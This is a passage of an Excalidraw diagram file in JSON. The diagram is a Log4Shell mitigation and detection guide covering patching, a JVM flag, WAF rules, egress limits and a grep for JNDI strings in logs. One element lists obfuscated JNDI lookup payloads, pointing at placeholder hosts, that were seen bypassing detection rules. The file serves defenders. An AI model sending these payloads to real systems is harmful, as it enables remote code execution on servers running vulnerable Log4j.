1162 | "x": 1248.6514577698492,
1163 | "y": 730.7097364693898,
1164 | "strokeColor": "#000000",
1165 | "backgroundColor": "#ffffff",
1166 | "width": 290.22298624461274,
1167 | "height": 264.48777863465745,
1168 | "seed": 695690176,
1169 | "groupIds": [],
1170 | "strokeSharpness": "sharp",
1171 | "boundElements": [],
1172 | "updated": 1639775213771
1173 | },
1174 | {
1175 | "id": "n5O0xTqrkmp5uz7rbM5-k",
1176 | "type": "text",
1177 | "x": 1254.0309270334953,
1178 | "y": 782.7183584001482,
1179 | "width": 273.74999999999994,
1180 | "height": 49.99999999999999,
1181 | "angle": 0,
1182 | "strokeColor": "#000000",
1183 | "backgroundColor": "#ffffff",
1184 | "fillStyle": "solid",
1185 | "strokeWidth": 1,
1186 | "strokeStyle": "dotted",
1187 | "roughness": 1,
1188 | "opacity": 80,
1189 | "groupIds": [],
1190 | "strokeSharpness": "sharp",
1191 | "seed": 161439808,
1192 | "version": 398,
1193 | "versionNonce": 1199601728,
1194 | "isDeleted": false,
1195 | "boundElements": null,
1196 | "updated": 1639775213771,
1197 | "text": "sudo egrep -I -i -r '\\$(\\{|%7B)jndi\n:(ldap[s]?|rmi|dns\n|nis|iiop|corba|nds|http):/[^\\n]+' /var/log\n",
1198 | "fontSize": 10.882870395293862,
1199 | "fontFamily": 3,
1200 | "textAlign": "center",
1201 | "verticalAlign": "top",
1202 | "baseline": 46.99999999999999,
1203 | "containerId": null,
1204 | "originalText": "sudo egrep -I -i -r '\\$(\\{|%7B)jndi\n:(ldap[s]?|rmi|dns\n|nis|iiop|corba|nds|http):/[^\\n]+' /var/log\n"
1205 | },
1206 | {
1207 | "id": "gLX93LgkoXT_5p9d1mgvK",
1208 | "type": "text",
1209 | "x": 1289.6003779394741,
1210 | "y": 740.3995205033143,
1211 | "width": 216.56549556472174,
1212 | "height": 39.55534165565697,
1213 | "angle": 0,
1214 | "strokeColor": "#000000",
1215 | "backgroundColor": "#ffffff",
1216 | "fillStyle": "solid",
1217 | "strokeWidth": 1,
1218 | "strokeStyle": "dotted",
1219 | "roughness": 1,
1220 | "opacity": 100,
1221 | "groupIds": [],
1222 | "strokeSharpness": "sharp",
1223 | "seed": 79499328,
1224 | "version": 332,
1225 | "versionNonce": 692547648,
1226 | "isDeleted": false,
1227 | "boundElements": null,
1228 | "updated": 1639775213771,
1229 | "text": "Look for JNDI payloads in \napplication & system logs",
1230 | "fontSize": 15.82213666226279,
1231 | "fontFamily": 1,
1232 | "textAlign": "center",
1233 | "verticalAlign": "top",
1234 | "baseline": 33.55534165565697,
1235 | "containerId": null,
1236 | "originalText": "Look for JNDI payloads in \napplication & system logs"
1237 | },
1238 | {
1239 | "type": "rectangle",
1240 | "version": 391,
1241 | "versionNonce": 89568192,
1242 | "isDeleted": false,
1243 | "id": "PkLRHCQ6gdWs61bCklqKZ",
1244 | "fillStyle": "solid",
1245 | "strokeWidth": 1,
1246 | "strokeStyle": "dotted",
1247 | "roughness": 1,
1248 | "opacity": 100,
1249 | "angle": 0,
1250 | "x": 825.7116557399083,
1251 | "y": 236.00611068267136,
1252 | "strokeColor": "#000000",
1253 | "backgroundColor": "#ffffff",
1254 | "width": 219.82668852018358,
1255 | "height": 121.98777863465739,
1256 | "seed": 803723328,
1257 | "groupIds": [],
1258 | "strokeSharpness": "sharp",
1259 | "boundElements": [],
1260 | "updated": 1639775213771
1261 | },
1262 | {
1263 | "id": "-i2a4dunmwGEoDaJ7tyuT",
1264 | "type": "text",
1265 | "x": 827.7168157853278,
1266 | "y": 292.92679136117175,
1267 | "width": 215,
1268 | "height": 26,
1269 | "angle": 0,
1270 | "strokeColor": "#000000",
1271 | "backgroundColor": "#ffffff",
1272 | "fillStyle": "solid",
1273 | "strokeWidth": 1,
1274 | "strokeStyle": "dotted",
1275 | "roughness": 1,
1276 | "opacity": 80,
1277 | "groupIds": [],
1278 | "strokeSharpness": "sharp",
1279 | "seed": 409751616,
1280 | "version": 271,
1281 | "versionNonce": 661612608,
1282 | "isDeleted": false,
1283 | "boundElements": null,
1284 | "updated": 1639775213772,
1285 | "text": "\"-Dlog4j2.formatMsgNoLookups=True\"\n",
1286 | "fontSize": 10.785532014685918,
1287 | "fontFamily": 3,
1288 | "textAlign": "center",
1289 | "verticalAlign": "top",
1290 | "baseline": 23,
1291 | "containerId": null,
1292 | "originalText": "\"-Dlog4j2.formatMsgNoLookups=True\"\n"
1293 | },
1294 | {
1295 | "id": "xI3JCxfhghBtP8yMt4-UM",
1296 | "type": "text",
1297 | "x": 843.6982864114575,
1298 | "y": 244.92756266858248,
1299 | "width": 183.03705874774076,
1300 | "height": 36.24496212826551,
1301 | "angle": 0,
1302 | "strokeColor": "#000000",
1303 | "backgroundColor": "#ffffff",
1304 | "fillStyle": "solid",
1305 | "strokeWidth": 1,
1306 | "strokeStyle": "dotted",
1307 | "roughness": 1,
1308 | "opacity": 100,
1309 | "groupIds": [],
1310 | "strokeSharpness": "sharp",
1311 | "seed": 1282409408,
1312 | "version": 272,
1313 | "versionNonce": 1472871360,
1314 | "isDeleted": false,
1315 | "boundElements": null,
1316 | "updated": 1639775213772,
1317 | "text": "Relaunch JVM \nwith a specific parameter",
1318 | "fontSize": 14.497984851306196,
1319 | "fontFamily": 1,
1320 | "textAlign": "center",
1321 | "verticalAlign": "top",
1322 | "baseline": 31.244962128265513,
1323 | "containerId": null,
1324 | "originalText": "Relaunch JVM \nwith a specific parameter"
1325 | },
1326 | {
1327 | "type": "text",
1328 | "version": 566,
1329 | "versionNonce": 232284224,
1330 | "isDeleted": false,
1331 | "id": "g77vc8KyHXno7YyV77UNZ",
1332 | "fillStyle": "hachure",
1333 | "strokeWidth": 1,
1334 | "strokeStyle": "dashed",
1335 | "roughness": 1,
1336 | "opacity": 100,
1337 | "angle": 0,
1338 | "x": 1694.5,
1339 | "y": 5.1250000000000995,
1340 | "strokeColor": "#000000",
1341 | "backgroundColor": "transparent",
1342 | "width": 431,
1343 | "height": 100,
1344 | "seed": 664619968,
1345 | "groupIds": [],
1346 | "strokeSharpness": "sharp",
1347 | "boundElements": [],
1348 | "updated": 1639775213772,
1349 | "fontSize": 20,
1350 | "fontFamily": 1,
1351 | "text": "Author : Loïc Castel\nhttps://www.linkedin.com/in/loicc/\nThanks to InterCERT-FR and Atos teams \n",
1352 | "baseline": 93,
1353 | "textAlign": "center",
1354 | "verticalAlign": "top",
1355 | "containerId": null,
1356 | "originalText": ""
1357 | },
1358 | {
1359 | "id": "Qco2h4oa96OARgMAqlVnz",
1360 | "type": "text",
1361 | "x": 863.0625,
1362 | "y": 310.6250000000001,
1363 | "width": 173,
1364 | "height": 42,
1365 | "angle": 0,
1366 | "strokeColor": "#c92a2a",
1367 | "backgroundColor": "#ffffff",
1368 | "fillStyle": "solid",
1369 | "strokeWidth": 1,
1370 | "strokeStyle": "dotted",
1371 | "roughness": 1,
1372 | "opacity": 80,
1373 | "groupIds": [],
1374 | "strokeSharpness": "sharp",
1375 | "seed": 1728200768,
1376 | "version": 219,
1377 | "versionNonce": 579650496,
1378 | "isDeleted": false,
1379 | "boundElements": null,
1380 | "updated": 1639775213772,
1381 | "text": "It is not recommended to \nrely only on this mitigation\nas bypasses have been identified",
1382 | "fontSize": 11.333333333333334,
1383 | "fontFamily": 1,
1384 | "textAlign": "center",
1385 | "verticalAlign": "top",
1386 | "baseline": 38,
1387 | "containerId": null,
1388 | "originalText": "It is not recommended to \nrely only on this mitigation\nas bypasses have been identified"
1389 | },
1390 | {
1391 | "id": "5CRx1zqaLs_h2AUQvPPjF",
1392 | "type": "image",
1393 | "x": 834.75,
1394 | "y": 310.3750000000001,
1395 | "width": 20.500000000000007,
1396 | "height": 40.750000000000014,
1397 | "angle": 0,
1398 | "strokeColor": "transparent",
1399 | "backgroundColor": "#ffffff",
1400 | "fillStyle": "solid",
1401 | "strokeWidth": 1,
1402 | "strokeStyle": "dotted",
1403 | "roughness": 1,
1404 | "opacity": 80,
1405 | "groupIds": [],
1406 | "strokeSharpness": "round",
1407 | "seed": 770118592,
1408 | "version": 78,
1409 | "versionNonce": 744642624,
1410 | "isDeleted": false,
1411 | "boundElements": null,
1412 | "updated": 1639775213772,
1413 | "status": "saved",
1414 | "fileId": "5fc454969dece69e77ad7ac5dd993b5ada247acb",
1415 | "scale": [
1416 | -1,
1417 | 1
1418 | ]
1419 | },
1420 | {
1421 | "type": "rectangle",
1422 | "version": 504,
1423 | "versionNonce": 62802880,
1424 | "isDeleted": false,
1425 | "id": "i2bqh6jKygnWD8X2GNBGd",
1426 | "fillStyle": "solid",
1427 | "strokeWidth": 1,
1428 | "strokeStyle": "dotted",
1429 | "roughness": 1,
1430 | "opacity": 100,
1431 | "angle": 0,
1432 | "x": 126.33665573990834,
1433 | "y": 224.13111068267142,
1434 | "strokeColor": "#c92a2a",
1435 | "backgroundColor": "#ffffff",
1436 | "width": 197.32668852018358,
1437 | "height": 84.48777863465742,
1438 | "seed": 1494639552,
1439 | "groupIds": [],
1440 | "strokeSharpness": "sharp",
1441 | "boundElements": [],
1442 | "updated": 1639775213772
1443 | },
1444 | {
1445 | "id": "WCThRd5Q7DcmW-HK2l_VZ",
1446 | "type": "text",
1447 | "x": 133,
1448 | "y": 235.6250000000001,
1449 | "width": 189,
1450 | "height": 60,
1451 | "angle": 0,
1452 | "strokeColor": "#c92a2a",
1453 | "backgroundColor": "#ffffff",
1454 | "fillStyle": "solid",
1455 | "strokeWidth": 1,
1456 | "strokeStyle": "dotted",
1457 | "roughness": 1,
1458 | "opacity": 100,
1459 | "groupIds": [],
1460 | "strokeSharpness": "sharp",
1461 | "seed": 1482733632,
1462 | "version": 127,
1463 | "versionNonce": 1434375104,
1464 | "isDeleted": false,
1465 | "boundElements": null,
1466 | "updated": 1639775213772,
1467 | "text": "Best option is to patch\nto 2.17.x (Java8) \nor 2.12.2 (Java7)",
1468 | "fontSize": 16,
1469 | "fontFamily": 1,
1470 | "textAlign": "center",
1471 | "verticalAlign": "top",
1472 | "baseline": 54,
1473 | "containerId": null,
1474 | "originalText": "Best option is to patch\nto 2.17.x (Java8) \nor 2.12.2 (Java7)"
1475 | },
1476 | {
1477 | "type": "rectangle",
1478 | "version": 537,
1479 | "versionNonce": 1700350016,
1480 | "isDeleted": false,
1481 | "id": "yTHOovNI9JD-maq_dxiPy",
1482 | "fillStyle": "solid",
1483 | "strokeWidth": 1,
1484 | "strokeStyle": "dotted",
1485 | "roughness": 1,
1486 | "opacity": 100,
1487 | "angle": 0,
1488 | "x": 363.8366557399082,
1489 | "y": 229.13111068267142,
1490 | "strokeColor": "#000000",
1491 | "backgroundColor": "#ffffff",
1492 | "width": 197.32668852018358,
1493 | "height": 169.4877786346574,
1494 | "seed": 1131457472,
1495 | "groupIds": [],
1496 | "strokeSharpness": "sharp",
1497 | "boundElements": [],
1498 | "updated": 1639775213772
1499 | },
1500 | {
1501 | "id": "JF47UCQBItgicg1G5HPG5",
1502 | "type": "text",
1503 | "x": 371.25,
1504 | "y": 240.6250000000001,
1505 | "width": 185,
1506 | "height": 160,
1507 | "angle": 0,
1508 | "strokeColor": "#000000",
1509 | "backgroundColor": "#ffffff",
1510 | "fillStyle": "solid",
1511 | "strokeWidth": 1,
1512 | "strokeStyle": "dotted",
1513 | "roughness": 1,
1514 | "opacity": 100,
1515 | "groupIds": [],
1516 | "strokeSharpness": "sharp",
1517 | "seed": 1455500224,
1518 | "version": 234,
1519 | "versionNonce": 864436288,
1520 | "isDeleted": false,
1521 | "boundElements": null,
1522 | "updated": 1639775213772,
1523 | "text": "A machine identified or \nsuspected to be\nvulnerable, if not \npatchable, can be \nisolated on a network\nzone without public\nInternet access \n(inbound or outbound)",
1524 | "fontSize": 16,
1525 | "fontFamily": 1,
1526 | "textAlign": "center",
1527 | "verticalAlign": "top",
1528 | "baseline": 154,
1529 | "containerId": null,
1530 | "originalText": "A machine identified or \nsuspected to be\nvulnerable, if not \npatchable, can be \nisolated on a network\nzone without public\nInternet access \n(inbound or outbound)"
1531 | },
1532 | {
1533 | "id": "kPadPI9yVCVFloCEcPYuK",
1534 | "type": "rectangle",
1535 | "x": 1578.75,
1536 | "y": 350.1250000000001,
1537 | "width": 553.75,
1538 | "height": 193.75,
1539 | "angle": 0,
1540 | "strokeColor": "#000000",
1541 | "backgroundColor": "#ced4da",
1542 | "fillStyle": "hachure",
1543 | "strokeWidth": 1,
1544 | "strokeStyle": "dotted",
1545 | "roughness": 1,
1546 | "opacity": 50,
1547 | "groupIds": [],
1548 | "strokeSharpness": "sharp",
1549 | "seed": 1009759168,
1550 | "version": 205,
1551 | "versionNonce": 1596777408,
1552 | "isDeleted": false,
1553 | "boundElements": null,
1554 | "updated": 1639775213772
1555 | },
1556 | {
1557 | "id": "Vqrm3_1kHKXyaM_l4JLev",
1558 | "type": "text",
1559 | "x": 1578.5,
1560 | "y": 386.03759640102845,
1561 | "width": 543,
1562 | "height": 154,
1563 | "angle": 0,
1564 | "strokeColor": "#000000",
1565 | "backgroundColor": "#ffffff",
1566 | "fillStyle": "solid",
1567 | "strokeWidth": 1,
1568 | "strokeStyle": "dotted",
1569 | "roughness": 1,
1570 | "opacity": 100,
1571 | "groupIds": [],
1572 | "strokeSharpness": "sharp",
1573 | "seed": 78549056,
1574 | "version": 277,
1575 | "versionNonce": 559167552,
1576 | "isDeleted": false,
1577 | "boundElements": null,
1578 | "updated": 1639775213772,
1579 | "text": "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}\n${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}\n${jndi:rmi://adsasd.asdasd.asdasd}\n${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://%s}\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}\n${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}\n${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//example.com}",
1580 | "fontSize": 11.16709511568123,
1581 | "fontFamily": 3,
1582 | "textAlign": "center",
1583 | "verticalAlign": "top",
1584 | "baseline": 151,
1585 | "containerId": null,
1586 | "originalText": "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}\n${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}\n${jndi:rmi://adsasd.asdasd.asdasd}\n${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://%s}\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}\n${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}\n${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//example.com}"
1587 | },
1588 | {
1589 | "id": "YG2aSjlcC0FWLTcRYuRTA",
1590 | "type": "text",
1591 | "x": 1648.75,
1592 | "y": 355.1250000000001,
1593 | "width": 416,
1594 | "height": 20,
1595 | "angle": 0,
1596 | "strokeColor": "#000000",
1597 | "backgroundColor": "#ffffff",
1598 | "fillStyle": "solid",
1599 | "strokeWidth": 1,
1600 | "strokeStyle": "dotted",
1601 | "roughness": 1,
1602 | "opacity": 100,
1603 | "groupIds": [],
1604 | "strokeSharpness": "sharp",
1605 | "seed": 1867897792,
1606 | "version": 223,
1607 | "versionNonce": 2002414528,
1608 | "isDeleted": false,
1609 | "boundElements": null,
1610 | "updated": 1639775213772,
1611 | "text": "Example of payloads seen to bypass detection rules",
1612 | "fontSize": 16,
1613 | "fontFamily": 1,
1614 | "textAlign": "center",
1615 | "verticalAlign": "top",
1616 | "baseline": 14,
1617 | "containerId": null,
1618 | "originalText": "Example of payloads seen to bypass detection rules"
1619 | },
1620 | {
1621 | "id": "3ndh9OygRMGt-cl4rY-2u",
1622 | "type": "text",
1623 | "x": 1137,
1624 | "y": 228.8750000000001,
1625 | "width": 206,
1626 | "height": 40,
1627 | "angle": 0,
1628 | "strokeColor": "#000000",
1629 | "backgroundColor": "#ced4da",
1630 | "fillStyle": "hachure",
1631 | "strokeWidth": 1,
1632 | "strokeStyle": "dotted",
1633 | "roughness": 1,
1634 | "opacity": 100,
1635 | "groupIds": [],
1636 | "strokeSharpness": "sharp",
1637 | "seed": 974235712,
1638 | "version": 44,
1639 | "versionNonce": 312684608,
1640 | "isDeleted": false,
1641 | "boundElements": null,
1642 | "updated": 1639775213772,
1643 | "text": "Add WAF rules to block \nmalicious inbound requests",
1644 | "fontSize": 16,
1645 | "fontFamily": 1,
1646 | "textAlign": "center",
1647 | "verticalAlign": "top",
1648 | "baseline": 34,
1649 | "containerId": null,
1650 | "originalText": "Add WAF rules to block \nmalicious inbound requests"
1651 | },
1652 | {
1653 | "id": "nBFYWmPAQXV-ObVJmPPt0",
1654 | "type": "text",
1655 | "x": 168.75,
1656 | "y": 743.8750000000002,
1657 | "width": 295,
1658 | "height": 20,
1659 | "angle": 0,
1660 | "strokeColor": "#000000",
1661 | "backgroundColor": "#ced4da",
1662 | "fillStyle": "hachure",
1663 | "strokeWidth": 1,
1664 | "strokeStyle": "dotted",
1665 | "roughness": 1,
1666 | "opacity": 100,
1667 | "groupIds": [],
1668 | "strokeSharpness": "sharp",
1669 | "seed": 1738014784,
1670 | "version": 259,
1671 | "versionNonce": 1083634624,
1672 | "isDeleted": false,
1673 | "boundElements": null,
1674 | "updated": 1639775213772,
1675 | "text": "Restrict egress back to the internet",
1676 | "fontSize": 16,
1677 | "fontFamily": 1,
1678 | "textAlign": "center",
1679 | "verticalAlign": "top",
1680 | "baseline": 14,
1681 | "containerId": null,
1682 | "originalText": "Restrict egress back to the internet"
1683 | },
1684 | {
1685 | "type": "rectangle",
1686 | "version": 869,
1687 | "versionNonce": 1971456064,
1688 | "isDeleted": false,
1689 | "id": "K0Ul94EJnMD2GQ6Qgtv-S",
1690 | "fillStyle": "hachure",
1691 | "strokeWidth": 1,
1692 | "strokeStyle": "dashed",
1693 | "roughness": 1,
1694 | "opacity": 100,
1695 | "angle": 0,
1696 | "x": 1704.962169944849,
1697 | "y": 94.47587414839887,
1698 | "strokeColor": "#c92a2a",
1699 | "backgroundColor": "transparent",
1700 | "width": 413.8256601103024,
1701 | "height": 110,
1702 | "seed": 1437816896,
1703 | "groupIds": [],
1704 | "strokeSharpness": "sharp",
1705 | "boundElements": [
1706 | {
1707 | "id": "FjIBXzNWpkLOUHXxxK4Ko",
1708 | "type": "text"
1709 | },
1710 | {
1711 | "id": "FjIBXzNWpkLOUHXxxK4Ko",
1712 | "type": "text"
1713 | },
1714 | {
1715 | "type": "text",
1716 | "id": "FjIBXzNWpkLOUHXxxK4Ko"
1717 | }
1718 | ],
1719 | "updated": 1639775496315
1720 | },
1721 | {
1722 | "type": "text",
1723 | "version": 726,
1724 | "versionNonce": 565287872,
1725 | "isDeleted": false,
1726 | "id": "FjIBXzNWpkLOUHXxxK4Ko",
1727 | "fillStyle": "hachure",
1728 | "strokeWidth": 1,
1729 | "strokeStyle": "dashed",
1730 | "roughness": 1,
1731 | "opacity": 100,
1732 | "angle": 0,
1733 | "x": 1734.962169944849,
1734 | "y": 136.97587414839887,
1735 | "strokeColor": "#c92a2a",
1736 | "backgroundColor": "transparent",
1737 | "width": 353.8256601103024,
1738 | "height": 25,
1739 | "seed": 335367104,
1740 | "groupIds": [],
1741 | "strokeSharpness": "sharp",
1742 | "boundElements": [],
1743 | "updated": 1639775496316,
1744 | "fontSize": 20,
1745 | "fontFamily": 1,
1746 | "text": "Firewall",
1747 | "baseline": 18,
1748 | "textAlign": "center",
1749 | "verticalAlign": "middle",
1750 | "containerId": "K0Ul94EJnMD2GQ6Qgtv-S",
1751 | "originalText": "Firewall"
1752 | },
1753 | {
1754 | "id": "6oO8dLXAUE06Zk1mv1llE",
1755 | "type": "text",
1756 | "x": 1656.75,
1757 | "y": 225.6250000000001,
1758 | "width": 434,
1759 | "height": 20,
1760 | "angle": 0,
1761 | "strokeColor": "#000000",
1762 | "backgroundColor": "#ced4da",
1763 | "fillStyle": "hachure",
1764 | "strokeWidth": 1,
1765 | "strokeStyle": "dotted",
1766 | "roughness": 1,
1767 | "opacity": 100,
1768 | "groupIds": [],
1769 | "strokeSharpness": "sharp",
1770 | "seed": 744922048,
1771 | "version": 189,
1772 | "versionNonce": 1156492224,
1773 | "isDeleted": false,
1774 | "boundElements": null,
1775 | "updated": 1639775517841,
1776 | "text": "Black lists of known IP & FQDN in filtering equipment",
1777 | "fontSize": 16,
1778 | "fontFamily": 1,
1779 | "textAlign": "center",
1780 | "verticalAlign": "top",
1781 | "baseline": 14,
1782 | "containerId": null,
1783 | "originalText": "Black lists of known IP & FQDN in filtering equipment"
1784 | },
1785 | {
1786 | "type": "text",
1787 | "version": 93,
1788 | "versionNonce": 508958784,
1789 | "isDeleted": false,
1790 | "id": "NiSEZs6lxnZ1VChI4-Cna",
1791 | "fillStyle": "hachure",
1792 | "strokeWidth": 1,
1793 | "strokeStyle": "dotted",
1794 | "roughness": 1,
1795 | "opacity": 100,
1796 | "angle": 0,
1797 | "x": 1114,
1798 | "y": 295.1250000000001,
1799 | "strokeColor": "#000000",
1800 | "backgroundColor": "#ced4da",
1801 | "width": 257,
1802 | "height": 40,
1803 | "seed": 1154938944,
1804 | "groupIds": [],
1805 | "strokeSharpness": "sharp",
1806 | "boundElements": [],
1807 | "updated": 1639775213773,
1808 | "fontSize": 16,
1809 | "fontFamily": 1,
1810 | "text": "Black lists of known IP & FQDN\nin filtering equipment",
1811 | "baseline": 34,
1812 | "textAlign": "center",
1813 | "verticalAlign": "top",
1814 | "containerId": null,
1815 | "originalText": "Black lists of known IP & FQDN\nin filtering equipment"
1816 | },
1817 | {
1818 | "id": "hri2D03CWQU55ppaIrYh0",
1819 | "type": "text",
1820 | "x": 213.75,
1821 | "y": 856.3750000000002,
1822 | "width": 195,
1823 | "height": 20,
1824 | "angle": 0,
1825 | "strokeColor": "#000000",
1826 | "backgroundColor": "#ced4da",
1827 | "fillStyle": "hachure",
1828 | "strokeWidth": 1,
1829 | "strokeStyle": "dotted",
1830 | "roughness": 1,
1831 | "opacity": 100,
1832 | "groupIds": [],
1833 | "strokeSharpness": "sharp",
1834 | "seed": 1461259200,
1835 | "version": 67,
1836 | "versionNonce": 736529344,
1837 | "isDeleted": false,
1838 | "boundElements": null,
1839 | "updated": 1639775213773,
1840 | "text": "Restrict outbound LDAP",
1841 | "fontSize": 16,
1842 | "fontFamily": 1,
1843 | "textAlign": "center",
1844 | "verticalAlign": "top",
1845 | "baseline": 14,
1846 | "containerId": null,
1847 | "originalText": "Restrict outbound LDAP"
1848 | },
1849 | {
1850 | "id": "x8R3RwN4cCUpkXCWSn2dl",
1851 | "type": "text",
1852 | "x": 193.75,
1853 | "y": 806.3750000000002,
1854 | "width": 235,
1855 | "height": 40,
1856 | "angle": 0,
1857 | "strokeColor": "#000000",
1858 | "backgroundColor": "#ced4da",
1859 | "fillStyle": "hachure",
1860 | "strokeWidth": 1,
1861 | "strokeStyle": "dotted",
1862 | "roughness": 1,
1863 | "opacity": 100,
1864 | "groupIds": [],
1865 | "strokeSharpness": "sharp",
1866 | "seed": 1736418240,
1867 | "version": 90,
1868 | "versionNonce": 1416171584,
1869 | "isDeleted": false,
1870 | "boundElements": null,
1871 | "updated": 1639775213773,
1872 | "text": "Whitelist outbound authorized\nhosts (DNS included)",
1873 | "fontSize": 16,
1874 | "fontFamily": 1,
1875 | "textAlign": "center",
1876 | "verticalAlign": "top",
1877 | "baseline": 34,
1878 | "containerId": null,
1879 | "originalText": "Whitelist outbound authorized\nhosts (DNS included)"
1880 | },
1881 | {
1882 | "id": "MjK9RLpBL74TY55hrjrMD",
1883 | "type": "text",
1884 | "x": 151.75,
1885 | "y": 777.6250000000002,
1886 | "width": 304,
1887 | "height": 20,
1888 | "angle": 0,
1889 | "strokeColor": "#000000",
1890 | "backgroundColor": "#ced4da",
1891 | "fillStyle": "hachure",
1892 | "strokeWidth": 1,
1893 | "strokeStyle": "dotted",
1894 | "roughness": 1,
1895 | "opacity": 100,
1896 | "groupIds": [],
1897 | "strokeSharpness": "sharp",
1898 | "seed": 2124423232,
1899 | "version": 75,
1900 | "versionNonce": 1319048128,
1901 | "isDeleted": false,
1902 | "boundElements": null,
1903 | "updated": 1639775213773,
1904 | "text": "Remove outbound access when possible",
1905 | "fontSize": 16,
1906 | "fontFamily": 1,
1907 | "textAlign": "center",
1908 | "verticalAlign": "top",
1909 | "baseline": 14,
1910 | "containerId": null,
1911 | "originalText": "Remove outbound access when possible"
1912 | },
1913 | {
1914 | "type": "rectangle",
1915 | "version": 628,
1916 | "versionNonce": 1029507136,
1917 | "isDeleted": false,
1918 | "id": "sf5vOacTp-bmrJ5eMdXfe",
1919 | "fillStyle": "solid",
1920 | "strokeWidth": 1,
1921 | "strokeStyle": "dotted",
1922 | "roughness": 1,
1923 | "opacity": 100,
1924 | "angle": 0,
1925 | "x": 1767.3885068776933,
1926 | "y": 728.5061106826715,
1927 | "strokeColor": "#000000",
1928 | "backgroundColor": "#ffffff",
1929 | "width": 382.7394234799214,
1930 | "height": 41.24999999999999,
1931 | "seed": 1427041216,
1932 | "groupIds": [],
1933 | "strokeSharpness": "sharp",
1934 | "boundElements": [],
1935 | "updated": 1639775213773
1936 | },
1937 | {
1938 | "type": "text",
1939 | "version": 213,
1940 | "versionNonce": 1027417024,
1941 | "isDeleted": false,
1942 | "id": "DK1lQhk6RaDMM3xNbL-lA",
1943 | "fillStyle": "hachure",
1944 | "strokeWidth": 1,
1945 | "strokeStyle": "dotted",
1946 | "roughness": 1,
1947 | "opacity": 100,
1948 | "angle": 0,
1949 | "x": 1142.75,
1950 | "y": 367.6250000000001,
1951 | "strokeColor": "#000000",
1952 | "backgroundColor": "#ced4da",
1953 | "width": 212,
1954 | "height": 60,
1955 | "seed": 1989434304,
1956 | "groupIds": [],
1957 | "strokeSharpness": "sharp",
1958 | "boundElements": [],
1959 | "updated": 1639775213773,
1960 | "fontSize": 16,
1961 | "fontFamily": 1,
1962 | "text": "SaaS WAF vendors have \nprovided log4shell rules \nin prevent mode by default",
1963 | "baseline": 54,
1964 | "textAlign": "center",
1965 | "verticalAlign": "top",
1966 | "containerId": null,
1967 | "originalText": "SaaS WAF vendors have \nprovided log4shell rules \nin prevent mode by default"
1968 | },
1969 | {
1970 | "id": "4TWMVfjQJEOpKSGrpRfcV",
1971 | "type": "text",
1972 | "x": 1603.25,
1973 | "y": 813.8750000000002,
1974 | "width": 99.99305555555557,
1975 | "height": 129.48741007194238,
1976 | "angle": 0,
1977 | "strokeColor": "#000000",
1978 | "backgroundColor": "#ced4da",
1979 | "fillStyle": "hachure",
1980 | "strokeWidth": 1,
1981 | "strokeStyle": "dotted",
1982 | "roughness": 1,
1983 | "opacity": 100,
1984 | "groupIds": [],
1985 | "strokeSharpness": "sharp",
1986 | "seed": 486887488,
1987 | "version": 260,
1988 | "versionNonce": 459798592,
1989 | "isDeleted": false,
1990 | "boundElements": null,
1991 | "updated": 1639775213773,
1992 | "text": "${${\r\n${::-\r\n%24%7B%3A%3A-\r\n${env:\r\n${date:\r\n${lower:\r\n${upper:\r\nhostName}\r\n}${\r\n${",
1993 | "fontSize": 11.509992006394882,
1994 | "fontFamily": 2,
1995 | "textAlign": "center",
1996 | "verticalAlign": "top",
1997 | "baseline": 127.48741007194238,
1998 | "containerId": null,
1999 | "originalText": "${${\r\n${::-\r\n%24%7B%3A%3A-\r\n${env:\r\n${date:\r\n${lower:\r\n${upper:\r\nhostName}\r\n}${\r\n${"
2000 | },
2001 | {
2002 | "id": "SPSvDYNbRoE1hAH1ktplZ",
2003 | "type": "text",
2004 | "x": 1551.75,
2005 | "y": 735.6250000000002,
2006 | "width": 202,
2007 | "height": 80,
2008 | "angle": 0,
2009 | "strokeColor": "#000000",
2010 | "backgroundColor": "#ced4da",
2011 | "fillStyle": "hachure",
2012 | "strokeWidth": 1,
2013 | "strokeStyle": "dotted",
2014 | "roughness": 1,
2015 | "opacity": 100,
2016 | "groupIds": [],
2017 | "strokeSharpness": "sharp",
2018 | "seed": 135010368,
2019 | "version": 245,
2020 | "versionNonce": 694332352,
2021 | "isDeleted": false,
2022 | "boundElements": null,
2023 | "updated": 1639775213773,
2024 | "text": "Look for specific string\n(the last two can generate \na lot \nof false positives)",
2025 | "fontSize": 16,
2026 | "fontFamily": 1,
2027 | "textAlign": "center",
2028 | "verticalAlign": "top",
2029 | "baseline": 74,
2030 | "containerId": null,
2031 | "originalText": "Look for specific string\n(the last two can generate \na lot \nof false positives)"
2032 | },
2033 | {
2034 | "id": "uvUX83OOn3jQ-2T8Kyhif",
2035 | "type": "text",
2036 | "x": 1592.875,
2037 | "y": 272.6250000000001,
2038 | "width": 574,
2039 | "height": 75,
2040 | "angle": 0,
2041 | "strokeColor": "#000000",
2042 | "backgroundColor": "#ced4da",
2043 | "fillStyle": "hachure",
2044 | "strokeWidth": 1,
